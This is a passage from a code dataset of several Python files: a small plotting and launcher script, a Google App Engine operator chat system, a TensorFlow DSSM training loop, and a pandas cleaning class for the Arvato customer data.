plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n \r\n Cauchy()\r\n","sub_path":"TP1.py","file_name":"TP1.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"227101880","text":"# Python Import ==================\nimport sys\n\n# User Import ======================\nfrom cycle_classes.Start import Start\n\nstrCurrent_path = sys.path[0] \n\nFILE_CYC_INPUT = \"cycle_dat.csv\" # input file for cycle module\nFILE_CYC_OUTPUT = \"cycle_out.csv\" # output file for cycle module\nFILE_CAB2CYC = \"cab2cyc_out.csv\" # output file for cabinit module\n\nFOLDER_INPUT = strCurrent_path + \"\\\\\" + \"data\"\nFOLDER_OUTPUT = strCurrent_path + \"\\\\\" + \"data\"\n \nobj_start = Start(FILE_CYC_INPUT, \n FILE_CYC_OUTPUT, \n FILE_CAB2CYC, \n FOLDER_INPUT, \n FOLDER_OUTPUT)\n\nis_solution = obj_start.main(True) # DEBUG ON\n# is_solution = obj_start.main(False) # DEBUG OFF\n\nobj_start.print_scr_rep(is_solution)\n","sub_path":"App/cycle_start_debug.py","file_name":"cycle_start_debug.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"467223639","text":"\nfrom google.appengine.api import channel\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext.ndb import polymodel\n\nimport datetime\n\nimport json\nimport logging\n\nfrom chat_settings import ChatSettings, ChatURL\nfrom site_settings import SiteSettings\n\ndef to_iso_format_hack(dt): \n # python datetime is bullshit and doesn't add the Z for iso\n # so isoformat does not actually return isoformat\n # this causes problems in firefox, which interprets it as a local date\n s = dt.isoformat()\n if (not s.endswith('Z')) and \\\n (not s.endswith('+00:00')) and \\\n (not s.endswith('-00:00')):\n return s + 'Z'\n else:\n return s\n\nclass ChatUser(polymodel.PolyModel): \n screenname = ndb.StringProperty()\n next_chat_msg_credit = ndb.DateTimeProperty(auto_now_add=True)\n chat_msg_credit = ndb.IntegerProperty(default=0)\n \n @ndb.transactional\n def chat_msg_rate_limit_check(self):\n if self.chat_msg_credit == 0:\n t = datetime.datetime.utcnow()\n if t < self.next_chat_msg_credit:\n return False\n else:\n self.next_chat_msg_credit = t + ChatSettings.CHAT_MSG_INTERVAL\n self.chat_msg_credit = ChatSettings.CHAT_MSG_PER_INTERVAL - 1\n self.put()\n return True\n self.chat_msg_credit -= 1\n self.put()\n return True\n \n def is_operator(self):\n return False\n \n @classmethod\n def channel_connected(cls, channel_user_id):\n args = channel_user_id.split('_')\n u = ChatUser.get_by_id(args[0])\n if u:\n u.handle_channel_connected(args)\n\n @classmethod\n def channel_disconnected(cls, channel_user_id):\n args = channel_user_id.split('_')\n u = ChatUser.get_by_id(args[0])\n if u:\n u.handle_channel_disconnected(args)\n\n def handle_channel_connected(self, vals):\n logging.info(\"connect not implemented?\")\n\n def handle_channel_disconnected(self, vals):\n logging.info(\"disconnect not implemented?\")\n \nclass ChatOperator(ChatUser):\n is_on_call = ndb.BooleanProperty(default=False)\n on_call_channel_token = ndb.StringProperty()\n on_call_channel_token_expiration = ndb.DateTimeProperty(auto_now_add=True)\n calls_answered = ndb.IntegerProperty(default=0)\n\n def is_operator(self):\n return True\n\n @ndb.transactional\n def answered_call(self):\n self.calls_answered += 1\n self.put()\n\n def answer_call(self, call_id):\n call = ChatCall.get_by_id(call_id)\n if not call:\n return None, None, None\n \n room, tok = call.answer(self)\n if not room:\n return None, None, None\n \n self.answered_call()\n\n return call, room, tok\n\n def refresh_calls(self, last_call_datetime):\n for c in ChatCall.calls_since(last_call_datetime):\n msg = c.to_operator_json(is_historic=True)\n channel.send_message(self.on_call_channel_token, msg) \n \n @classmethod\n def gauth_user_id(cls, raw_user_id): \n # in case we do non-google logins\n return \"gplus{0}\".format(raw_user_id)\n \n @classmethod\n def gauth_get_or_insert(cls, user_id): \n o = ChatOperator.get_or_insert(user_id)\n if o: \n o.put()\n return o\n\n @classmethod\n def announce_call(cls, call):\n msg = call.to_operator_json()\n operators = cls.query(cls.is_on_call==True).fetch()\n for operator in operators:\n channel.send_message(operator.on_call_channel_token, msg) \n\n @classmethod\n def verify_email(cls, email):\n return SiteSettings.verify_email(email)\n\n def to_on_call_channel_user_id(self):\n return str(self.key.id()) + '_oncall' \n\n def update_rooms(self):\n # find all rooms this user is in and refresh screen name lists\n rooms = ChatRoom.query(ChatRoom.chat_channels.user_key == self.key).fetch(20)\n if not rooms:\n return\n \n for r in rooms:\n r.refresh_screennames() \n \n @ndb.transactional\n def go_on_call(self, check_channel=True):\n # TODO save the date and do date compare\n # also this is bad but meh\n if check_channel:\n t = datetime.datetime.utcnow()\n if (not self.on_call_channel_token) or (t >= self.on_call_channel_token_expiration):\n self.on_call_channel_token = channel.create_channel(self.to_on_call_channel_user_id(),\n ChatSettings.OPERATOR_CHANNEL_MINUTES)\n self.on_call_channel_token_expiration = t + \\\n ChatSettings.OPERATOR_CHANNEL_DURATION\n self.is_on_call = True\n self.put()\n\n @ndb.transactional\n def go_off_call(self):\n self.is_on_call = False\n self.put()\n \n def handle_channel_connected(self, vals):\n if vals[1] == 'oncall':\n # sometimes channel disconnects in dev server\n # TODO: not sure if it's dev server nonsense or local bug\n self.is_on_call = True\n self.put()\n return\n\n def handle_channel_disconnected(self, vals):\n if vals[1] == 'oncall':\n self.go_off_call()\n else:\n room = ChatRoom.get_by_id(long(vals[1]))\n if room:\n room.remove_user(self)\n\nclass ChatCaller(ChatUser):\n def remote_addr(self):\n s = str(self.key.id())\n return s[len('caller'):]\n \n @classmethod\n def form_user_id(cls, remote_addr):\n return 'caller{0}'.format(remote_addr)\n\n @classmethod\n def caller_get_or_insert(cls, remote_addr, screenname):\n # TODO: need to make this multiple for people behind proxies/NATs (though unlikely for now)\n if not screenname:\n screenname = ''\n caller = cls.get_or_insert(ChatCaller.form_user_id(remote_addr), screenname=screenname)\n if not caller:\n return None\n \n caller.put()\n \n return caller\n \n def handle_channel_connected(self, vals):\n pass\n\n def handle_channel_disconnected(self, vals):\n room = ChatRoom.get_by_id(long(vals[1]))\n if room:\n room.remove_user(self)\n\nclass ChatChannel(ndb.Model):\n user_key = ndb.KeyProperty(kind=ChatUser)\n room_key = ndb.KeyProperty(kind='ChatRoom')\n channel_token = ndb.StringProperty()\n \nclass ChatRoom(polymodel.PolyModel): \n chat_channels = ndb.StructuredProperty(ChatChannel, repeated=True)\n parent_call = ndb.KeyProperty(kind='ChatCall', default=None)\n \n def has_user_key(self, user_key):\n c = self.get_channel_for_user(user_key)\n if c:\n return c\n else:\n return None\n\n @ndb.transactional\n def remove_user_key_t(self, user_key):\n remove_index = None\n for i, c in enumerate(self.chat_channels):\n if c.user_key == user_key:\n remove_index = i\n break\n if remove_index is not None:\n del self.chat_channels[remove_index]\n self.put()\n\n def remove_user(self, user):\n self.remove_user_key_t(user.key)\n self.announce_user_leave(user)\n \n # better have called room.put() and user.put() at least once so key is valid\n @ndb.transactional\n def add_user_key(self, user_key):\n # TODO: this should be a transaction probably\n c = self.has_user_key(user_key)\n if c:\n return c.channel_token, False\n \n tok = channel.create_channel(self.get_channel_id(user_key), ChatSettings.CHAT_CHANNEL_MINUTES) \n if not tok: \n return None, None\n \n self.chat_channels.append(ChatChannel(\n user_key = user_key,\n room_key = self.key,\n channel_token = tok)\n )\n self.put()\n \n return tok, True\n \n def get_channel_id(self, user_key):\n return '{0}_{1}'.format(user_key.id(), self.key.id()) \n\n def get_channel_for_user(self, user_key):\n for c in self.chat_channels:\n if c.user_key == user_key:\n return c\n return None\n \n def get_screennames(self):\n def user_key_to_screenname(user_key):\n u = user_key.get()\n if u:\n return u.screenname\n else:\n return \"\"\n \n return [ user_key_to_screenname(c.user_key) for c in self.chat_channels ]\n\n def refresh_screennames(self): \n msg = json.dumps({\n 'content' : 'screennames',\n 'screennames' : self.get_screennames(),\n })\n for chan in self.chat_channels:\n channel.send_message(chan.channel_token, msg) \n\n def announce_user_join(self, user):\n msg = json.dumps({\n 'content' : 'announcement',\n 'line' : u'{0} has joined the room'.format(user.screenname),\n })\n for chan in self.chat_channels:\n if chan.user_key != user.key:\n channel.send_message(chan.channel_token, msg) \n\n def announce_user_leave(self, user):\n msg = json.dumps({\n 'content' : 'announcement',\n 'line' : u'{0} has left the room'.format(user.screenname),\n })\n for chan in self.chat_channels:\n if chan.user_key != user.key:\n channel.send_message(chan.channel_token, msg) \n \nclass ChatCall(ndb.Model):\n caller_channel = ndb.StructuredProperty(ChatChannel)\n call_datetime = ndb.DateTimeProperty(auto_now_add=True) \n answered_datetime = ndb.DateTimeProperty(default=None)\n answered_by = ndb.KeyProperty(kind=ChatOperator, default=None)\n\n def caller_url(self):\n return '/room?room={0}&call={1}'.format(self.caller_channel.room_key.id(), self.key.id())\n\n def operator_url(self):\n return \"{0}?call_id={1}\".format(ChatURL.OANSWER, self.key.id())\n \n def to_operator_json(self, is_historic = False): \n msg = {\n 'call_id' : self.key.id(),\n 'call_url' : self.operator_url(),\n 'call_date' : to_iso_format_hack(self.call_datetime),\n }\n if is_historic:\n msg['is_historic'] = 1\n if not self.answered_datetime is None:\n msg['call_answered'] = str(self.answered_datetime)\n\n return json.dumps(msg)\n\n @ndb.transactional\n def mark_answered(self, operator):\n if self.answered_by is None:\n self.answered_by = operator.key\n self.put()\n return True\n elif self.answered_by == operator.key:\n return True\n else:\n return False\n \n def answer(self, operator):\n try:\n won = self.mark_answered(operator)\n except:\n logging.info('{0}: operator {1} call {2}'.format(e, operator, call))\n won = False\n\n if not won:\n return None, None\n \n room = self.caller_channel.room_key.get()\n if not room:\n logging.info('no room')\n return None, None\n\n try:\n tok, added = room.add_user_key(operator.key)\n except Exception as e:\n # could be transaction failure\n logging.info('{0}: room {1} operator {2}'.format(e, room, operator))\n tok = None\n \n if not tok:\n return None, None \n \n self.answered_datetime = datetime.datetime.utcnow()\n self.put() \n return room, tok\n\n @classmethod\n def calls_since(cls, last_call_datetime):\n # get 20 most recent, but sort from earliest time\n return sorted(\n cls.query(cls.call_datetime > last_call_datetime).order(-cls.call_datetime).fetch(20),\n key=lambda c: c.call_datetime)\n \n @classmethod\n def factory(cls, caller_key):\n call = ChatCall()\n if not call:\n return None\n \n room = ChatRoom()\n if not room:\n # call isn't put, so should be okay?\n return None\n\n call.put() # so call.key is valid\n room.parent_call = call.key\n room.put() # so room.key is valid\n\n tok, newly_added = room.add_user_key(caller_key)\n if not tok:\n call.key.delete()\n room.key.delete()\n return\n \n call.caller_channel = ChatChannel(user_key = caller_key,\n room_key = room.key,\n channel_token = tok)\n call.put()\n return call\n\nclass ChatMsg(ndb.Model):\n user_key = ndb.KeyProperty(kind=ChatUser) \n room_key = ndb.KeyProperty(kind=ChatRoom)\n msg = ndb.StringProperty()\n sent_datetime = ndb.DateTimeProperty(auto_now_add=True) \n","sub_path":"chat_objs.py","file_name":"chat_objs.py","file_ext":"py","file_size_in_byte":12912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"288755490","text":"from DSSM.batchiterators.fileiterators import NaturalQuestionsFileIterator\nfrom DSSM.dssm.model import *\nimport numpy as np\nfrom tqdm import tqdm\nfrom matplotlib import pyplot as plt\n\nfrom DSSM.helpers.helpers import correct_guesses_of_dssm\n\ninit = tf.compat.v1.global_variables_initializer()\n\nsaver = tf.compat.v1.train.Saver()\n\n# First just train on nq\ndef get_feed_dict(batch):\n q_indices_batch = batch.get_q_indices()\n p_indices_batch = batch.get_relevant_indices()\n n1_indices_batch, n2_indices_batch, n3_indices_batch, n4_indices_batch = batch.get_irrelevant_indices()\n\n q_values_batch = np.ones(q_indices_batch.shape[0], dtype=int)\n p_values_batch = np.ones(p_indices_batch.shape[0], dtype=int)\n n1_values_batch = np.ones(n1_indices_batch.shape[0], dtype=int)\n n2_values_batch = np.ones(n2_indices_batch.shape[0], dtype=int)\n n3_values_batch = np.ones(n3_indices_batch.shape[0], dtype=int)\n n4_values_batch = np.ones(n4_indices_batch.shape[0], dtype=int)\n\n feed_dict = {\n q_indices: q_indices_batch,\n q_values: q_values_batch,\n p_indices: p_indices_batch,\n p_values: p_values_batch,\n n1_indices: n1_indices_batch,\n n1_values: n1_values_batch,\n n2_indices: n2_indices_batch,\n n2_values: n2_values_batch,\n n3_indices: n3_indices_batch,\n n3_values: n3_values_batch,\n n4_indices: n4_indices_batch,\n n4_values: n4_values_batch\n }\n return feed_dict\n\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nplt.ion()\n\nfig.show()\nfig.canvas.draw()\n\n\ndef update_plot(data1, data2):\n ax.clear()\n ax.plot(data1)\n ax.plot(data2)\n ax.set_ylim(bottom=0)\n fig.canvas.draw()\n # `start_event_loop` is required for console, not jupyter notebooks.\n # Don't use `plt.pause` because it steals focus and makes it hard\n # to stop the app.\n fig.canvas.start_event_loop(0.001)\n\n\nwith tf.compat.v1.Session() as sess:\n sess.run(init)\n\n train_epoch_accuracies = []\n train_losses = []\n val_epoch_accuracies = []\n val_losses = []\n\n trainingSet = NaturalQuestionsFileIterator(\"/Users/sahandzarrinkoub/School/year5/thesis/datasets/preprocessed_backup/nq/smalltrain.csv\",\n batch_size = BATCH_SIZE,\n no_of_irrelevant_samples = 4,\n encodingType=\"NGRAM\")\n validationSet = NaturalQuestionsFileIterator(\"/Users/sahandzarrinkoub/School/year5/thesis/datasets/preprocessed_backup/nq/smallvalidation.csv\",\n batch_size=BATCH_SIZE,\n no_of_irrelevant_samples=4,\n encodingType=\"NGRAM\")\n for epoch in range(10):\n if epoch > 0:\n trainingSet.restart()\n validationSet.restart()\n\n ll_train_overall = 0\n correct_train = 0\n for batch in tqdm(trainingSet):\n feed_dict = get_feed_dict(batch)\n\n _, ll = sess.run([optimizer, logloss], feed_dict=feed_dict)\n print(ll)\n ll_train_overall += ll\n correct_train += correct_guesses_of_dssm(sess, feed_dict, prob_p, prob_n1, prob_n2, prob_n3, prob_n4)\n\n train_losses.append(ll_train_overall / trainingSet.getNoOfDataPoints())\n train_epoch_accuracies.append(correct_train / trainingSet.getNoOfDataPoints())\n\n\n #evaluate on validation set\n ll_val_overall = 0\n correct_val = 0\n for batch in validationSet:\n feed_dict = get_feed_dict(batch)\n (ll_val,) = sess.run([logloss], feed_dict=feed_dict)\n correct_val += correct_guesses_of_dssm(sess, feed_dict, prob_p, prob_n1, prob_n2, prob_n3, prob_n4)\n ll_val_overall += ll_val\n val_losses.append(ll_val_overall / validationSet.getNoOfDataPoints())\n val_epoch_accuracies.append(correct_val / validationSet.getNoOfDataPoints())\n\n update_plot(train_losses, val_losses)\n\n plt.figure()\n plt.plot(train_epoch_accuracies)\n plt.plot(val_epoch_accuracies)\n plt.xlabel(\"epoch\")\n plt.ylabel(\"accuracy\")\n plt.title(\"accuracies\")\n plt.figure()\n plt.plot(train_losses)\n plt.plot(val_losses)\n plt.xlabel(\"batch\")\n plt.title(\"loss\")\n plt.show()\n saver.save(sess, './saved_model', global_step=epoch)\n","sub_path":"dssm/dssm_word_vs_ngram.py","file_name":"dssm_word_vs_ngram.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"347232412","text":"\"\"\"\nDescription\n-----------\n\n This module is linked to the Arvato Project Workbook (jupyterlab notebook). Many explanation is given in the workbook. \n\n\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\n\n\nclass PreDataCleaner:\n \"\"\"\n Description\n -----------\n\n This class will provide some functionality to execute some basic cleanining \n a arvato data set\n \"\"\"\n \n \n @property\n def df_metadata(self):\n return self.__df_metadata\n \n @df_metadata.setter\n def df_metadata(self, val):\n self.__df_metadata = val \n \n def __init__(self, df_metadata:pd.DataFrame):\n \"\"\"\n Description\n -----------\n\n inits the class.\n \n Parameters\n ----------\n df_metadata: pd.DataFrame\n pandas dataframe with the loaded data from file \"DIAS Attributes - Values 2017.xlsx\". Containing\n information about the attribute values.\n \"\"\"\n self.df_metadata = df_metadata\n\n # replace the metadata attribute column ending \"_RZ\" by \"\" in order to match the dataset column names\n self.df_metadata['Attribute'] = self.df_metadata['Attribute'].str.replace('_RZ','')\n\n \n def transform(self, df:pd.DataFrame, drop_duplicates:bool=False, build_kind_features:bool=True, drop_cols:bool=True)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n \n executes the data transformation (cleaning)\n\n Parameters\n ----------\n\n df : pd.DataFrame\n the dataframe that is to be cleaned\n\n \"\"\" \n df = self.__drop_customer_columns(df)\n df = self.__handle_data_load_errors(df)\n \n if drop_duplicates:\n df.drop_duplicates(inplace=True)\n \n df = self.__fix_year_columns(df)\n df = self.__mark_nans(df)\n \n if build_kind_features:\n df = self.__build_features_chidren(df, drop_childcols=False)\n \n df = self.__catvars_to_dummies(df) \n df = self.__catvars_to_binary(df) \n \n if drop_cols: \n df = self.__drop_columns(df) \n \n return df\n \n \n def fit (self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n\n prepare data for transformation\n \"\"\"\n\n pass\n \n def __fix_year_columns(self, df:pd.DataFrame) ->pd.DataFrame:\n \"\"\"\n Description\n ------------\n \n converts year columns to int\n \"\"\" \n cols = ['MIN_GEBAEUDEJAHR','EINGEZOGENAM_HH_JAHR','GEBURTSJAHR']\n print(f'fixing year columns: {cols}')\n for col in cols:\n df[col].fillna(df[col].median(), inplace=True)\n df[col].astype('int')\n \n \n return df\n \n \n\n \n def __drop_customer_columns (self, df:pd.DataFrame, columns_to_drop:bool=None)->pd.DataFrame:\n \"\"\"\n drop additional coloumns of the customer dataset\n \"\"\"\n cols = ['CUSTOMER_GROUP', 'ONLINE_PURCHASE', 'PRODUCT_GROUP'] \n \n if cols[0] in df.columns:\n print(f'Dropping customer dataset cols: {cols}')\n df = self.__drop_columns(df, cols)\n \n return df\n \n \n \n def __handle_data_load_errors(self, df:pd.DataFrame) ->pd.DataFrame:\n \"\"\"\n handles the errors fo columns 18 and 19 of dtype float that contain two 18,19 \n \"\"\"\n cols_to_fix = {'CAMEO_DEUG_2015':'X', 'CAMEO_INTL_2015':'XX'}\n\n print(f'fixing load errors {cols_to_fix}')\n\n for col, val in cols_to_fix.items():\n n = df.loc[df[col] == val].shape[0]\n df.loc[df[col] == val, col] = np.NaN\n df.loc[:,col] = df.loc[:,col].astype('float')\n\n print(f'fixed column {col} - records fixed: {n}')\n \n return df\n\n\n def __drop_columns(self, df:pd.DataFrame, columns_to_drop:list=None)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n \n LP_STATUS_GROB: drop this as LP_STATUS_FEIN contains the same information more detailed\n LP_FAMILIE_GROB : analogue to LP_STATUS_GROB\n D19_VERSAND_ANZ_24: drop\n EINGEFUEGT_AM : just timestamp information when the record has been created\n LP_LEBENSPHASE_FEIN: drop - we keep just LP_LEBENSPHASE_GROB\n\n \"\"\"\n # if columns to drop have been defined then use them \n # else execute the default cleaning \n if columns_to_drop: \n cols_to_drop = columns_to_drop\n else:\n # default set of columns to drop\n cols_to_drop = ['EINGEFUEGT_AM']\n \n # drop because of very high correlation to other columns (>=0.9).\n cols_toomuchcorrelation = ['CAMEO_DEU_2015','LP_STATUS_GROB','LP_FAMILIE_GROB','D19_VERSAND_ANZ_24','LP_LEBENSPHASE_FEIN', \n 'ANZ_STATISTISCHE_HAUSHALTE', 'CAMEO_INTL_2015', 'D19_VERSAND_ONLINE_DATUM', 'KBA13_HALTER_66',\n 'KBA13_HERST_SONST', #'LP_LEBENSPHASE_GROB'\n 'PLZ8_BAUMAX', 'PLZ8_GBZ', 'PLZ8_HHZ',\n 'D19_GESAMT_ANZ_24', 'D19_VERSAND_ANZ_12', 'D19_VERSAND_DATUM', 'KBA05_KRSHERST2', \n 'KBA05_KRSHERST3', 'KBA05_SEG9', 'KBA13_KMH_211', 'PLZ8_ANTG1', 'PLZ8_ANTG3']\n \n \n # drop because of too many NULL values (>30%) \n cols_toomanynulls = ['ALTER_KIND4', 'TITEL_KZ', 'ALTER_KIND3', 'ALTER_KIND2', 'ALTER_KIND1', \n 'AGER_TYP', 'EXTSEL992', 'KK_KUNDENTYP', 'KBA05_BAUMAX', 'ALTER_HH','D19_LETZTER_KAUF_BRANCHE']\n \n #\n # columns if threshold is 25% \n #\n # ['EXTSEL992','KK_KUNDENTYP', 'ALTERSKATEGORIE_FEIN', \n #'D19_LETZTER_KAUF_BRANCHE','D19_GESAMT_ONLINE_QUOTE_12', 'D19_SOZIALES', 'D19_LOTTO','D19_KONSUMTYP', \n # 'D19_VERSAND_ONLINE_QUOTE_12','D19_TELKO_ONLINE_QUOTE_12', 'D19_VERSI_ONLINE_QUOTE_12', 'D19_BANKEN_ONLINE_QUOTE_12',\n #'ALTER_HH', 'KBA05_BAUMAX', 'AGER_TYP', 'TITEL_KZ'] \n \n cols_to_drop = cols_to_drop + cols_toomuchcorrelation + cols_toomanynulls\n\n print(f'dropping columns: {cols_to_drop}') \n\n try:\n df.drop(labels=cols_to_drop, axis=1, inplace=True) \n except KeyError as ex_keyerror:\n print(f'CATCHED EXCEPTION: KeyError: you tried to drop non existing columns: {cols_to_drop}')\n print(f'Failed columns: {ex_keyerror.args}')\n\n return df \n\n def __catvars_to_dummies(self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n\n handles categorical variables. This will generate one hot encodings for the defined columns\n \"\"\"\n #'CAMEO_DEU_2015' will be dropped - ignore this\n # D19_LETZTER_KAUF_BRANCHE-> will be deleted \n cat_cols = []\n\n print('creating one hot encoding columns for: ')\n for col in cat_cols:\n print(f'\\t{col}')\n\n if cat_cols:\n # create one hot encodings using pandas get_dummies function\n df_dummies = pd.get_dummies(df[cat_cols], prefix=cat_cols, drop_first=True).astype('int64')\n df = pd.concat([df, df_dummies], axis=1)\n\n # drop original columns\n df.drop(cat_cols, axis=1, inplace=True) \n\n return df\n\n def __catvars_to_binary(self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n\n \"\"\"\n cat_cols = {'OST_WEST_KZ':{'W':0,'O':1}}\n\n print('convert to binary: ')\n for col, dict_map in cat_cols.items():\n print(f'\\tcolumn: {col} - Mapping: {dict_map}')\n df.loc[:,col] = df.loc[:,col].map(dict_map)\n\n return df\n\n\n\n def __mark_nans(self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n\n replaces all unkown values by np.NAN so that the pandas NAN functions can be used.\n\n Parameters\n ----------\n\n df : pd.DataFrame\n pandas DataFrame that is to be cleaned. Frame is expected to have columns as AZDIAS or CUSTOMERS \n \"\"\" \n\n print('replace unkown values by NaNs: ') \n unknown_val_set = self.df_metadata.copy()\n \n # select all row that contain the term \"unknown\" \n unknown_val_set = unknown_val_set[(unknown_val_set['Meaning'].str.contains('unknown'))]\n unknown_val_set['value_list'] = unknown_val_set['Value'].str.split(',')\n \n #with progressbar.ProgressBar(max_value=unknown_val_set.index.shape[0]) as bar:\n cnt = 0\n max_value=unknown_val_set.index.shape[0]\n for idx in unknown_val_set.index:\n col = unknown_val_set.loc[idx,'Attribute']\n vals = unknown_val_set.loc[idx,'value_list']\n # str convert to integers\n vals = list(map(int,vals))\n if col in df:\n df.loc[df[col].isin(vals),col] = np.NaN\n\n cnt += 1\n if (cnt == max_value) or (cnt % (max_value // 10)==0):\n print(f'\\tProcessed columns\\r{cnt:4} of {max_value}', end='\\r')\n \n \n #fix CAMEO_DEU_2015 XX will be dropped\n df.loc[df['CAMEO_DEU_2015']=='XX','CAMEO_DEU_2015'] = np.NaN\n print()\n \n # fix for LP_LEBENSPHASE_GROB','LP_FAMILIE_FEIN => 0 is not described. We handle it as unknown == missing\n cols = ['LP_LEBENSPHASE_GROB','LP_FAMILIE_FEIN','GEBURTSJAHR']\n print(f'replace 0 by NaNs for : {cols}')\n df.replace({'LP_LEBENSPHASE_GROB':0 ,'LP_FAMILIE_FEIN':0, 'GEBURTSJAHR':0}, np.NaN, inplace=True)\n \n return df\n \n def __build_features_chidren(self, df:pd.DataFrame, drop_childcols:bool = True)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n \n This function will build some features based on the given input data\n\n * Children and Teens: \n * Children:= number of children younger or equal than 10\n * Teens := number of children older or equal than 10\n\n Parameters\n ----------\n df : pd.DataFrame\n pandas DataFrame that is to be cleaned. Frame is expected to have columns as AZDIAS or CUSTOMERS \n \"\"\"\n \n # num of children > 0\n df['d_HAS_CHILDREN'] = 0\n # younger than or equal 10\n df['d_HAS_CHILDREN_YTE10'] = 0\n\n df.loc[df['ANZ_KINDER'] > 0, 'd_HAS_CHILDREN'] = 1\n\n # mask to filter rows that have at least one record\n mask = df[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']].max(axis=1) < 11\n df.loc[mask, 'd_HAS_CHILDREN_YTE10'] = 1\n \n child_cols = ['ANZ_KINDER','ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']\n \n if drop_childcols:\n df.drop(child_cols, axis='columns', inplace=True)\n \n return df\n \n\n\n def __calc_children_features(self, s):\n \"\"\"\n Description\n -----------\n uses features 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER' to reduce them to \n 'd_HAS_CHILDREN', 'd_HAS_CHILDREN_YTE10'\n\n\n * d_HAS_CHILDREN_YTE10 if person has children ANZ_KINDER>0\n * d_HAS_CHILDREN if person has at least one children <= 10 \n\n Parameters\n ----------\n s : pd.Series\n series of a particular DataFrame row containing at least these columns\n 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER', 'd_HAS_CHILDREN', 'd_HAS_CHILDREN_YTE10'\n \"\"\" \n yte_10 = (s[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']] <= 10).sum()\n \n\n s['d_HAS_CHILDREN'] = s['ANZ_KINDER']>0\n s['d_HAS_CHILDREN_YTE10'] = yte_10>0\n \n return s\n\n def __calc_child_and_teens(self, s):\n \"\"\"\n Description\n -----------\n\n counts the number of children less 10 and greater equal than 10. I assume that for more than 5 children\n all children > 4 are older than 10. Based on the analysis this is in general true\n\n Parameters\n ----------\n s : pd.Series\n series of a particular DataFrame row containing at least these columns\n 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER', 'd_NUM_CHILDREN_LESS_10', 'd_NUM_CHILDREN_GTE_10'\n \"\"\" \n less_10 = (s[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']] < 10).sum()\n gte_10 = s['ANZ_KINDER'] - less_10\n\n s['d_NUM_CHILDREN_LESS_10'] = less_10\n s['d_NUM_CHILDREN_GTE_10'] = gte_10\n \n return s\n\n\n \n \n \n \n\nclass FeatureBuilder:\n \"\"\"\n Description\n -----------\n\n executes some data transformations on a arvato dataset and creates some new features\n \"\"\"\n \n def __init__(self):\n pass\n\n def transform(self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n\n executes the data transformation \n\n Parameters\n ----------\n df : pd.DataFrame\n pandas DataFrame that is to be cleaned. Frame is expected to have columns as AZDIAS or CUSTOMERS \n\n\n \"\"\"\n self.__build_features_chidren(df)\n\n return df\n \n def fit (self, df:pd.DataFrame)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n \n prepare data for transformation\n \"\"\"\n pass\n\n def __build_features_chidren(self, df:pd.DataFrame, drop_childcols:bool = True)->pd.DataFrame:\n \"\"\"\n Description\n -----------\n \n This function will build some features based on the given input data\n\n * Children and Teens: \n * Children:= number of children younger or equal than 10\n * Teens := number of children older or equal than 10\n\n Parameters\n ----------\n df : pd.DataFrame\n pandas DataFrame that is to be cleaned. Frame is expected to have columns as AZDIAS or CUSTOMERS \n \"\"\"\n \n # num of children > 0\n df['d_HAS_CHILDREN'] = 0\n # younger than or equal 10\n df['d_HAS_CHILDREN_YTE10'] = 0\n\n df.loc[df['ANZ_KINDER'] > 0, 'd_HAS_CHILDREN'] = 1\n\n # mask to filter rows that have at least one record\n mask = df[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']].max(axis=1) < 11\n df.loc[mask, 'd_HAS_CHILDREN_YTE10'] = 1\n \n child_cols = ['ANZ_KINDER','ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']\n \n if drop_childcols:\n df.drop(child_cols, axis='columns', inplace=True)\n \n return df\n \n\n\n def __calc_children_features(self, s):\n \"\"\"\n Description\n -----------\n uses features 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER' to reduce them to \n 'd_HAS_CHILDREN', 'd_HAS_CHILDREN_YTE10'\n\n\n * d_HAS_CHILDREN_YTE10 if person has children ANZ_KINDER>0\n * d_HAS_CHILDREN if person has at least one children <= 10 \n\n Parameters\n ----------\n s : pd.Series\n series of a particular DataFrame row containing at least these columns\n 'ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4', 'ANZ_KINDER', 'd_HAS_CHILDREN', 'd_HAS_CHILDREN_YTE10'\n \"\"\" \n yte_10 = (s[['ALTER_KIND1','ALTER_KIND2','ALTER_KIND3','ALTER_KIND4']] <= 10).sum()\n \n\n s['d_HAS_CHILDREN'] = s['ANZ_KINDER']>0\n s['d_HAS_CHILDREN_YTE10'] = yte_10>0\n \n return s\n\n def __calc_child_and_teens(self, s):\n \"\"\"\n Description\n -----------\n\n counts the number of children less 10 and greater equal than 10. I assume that for more than 5 children\n all children > 4 are older than 10. 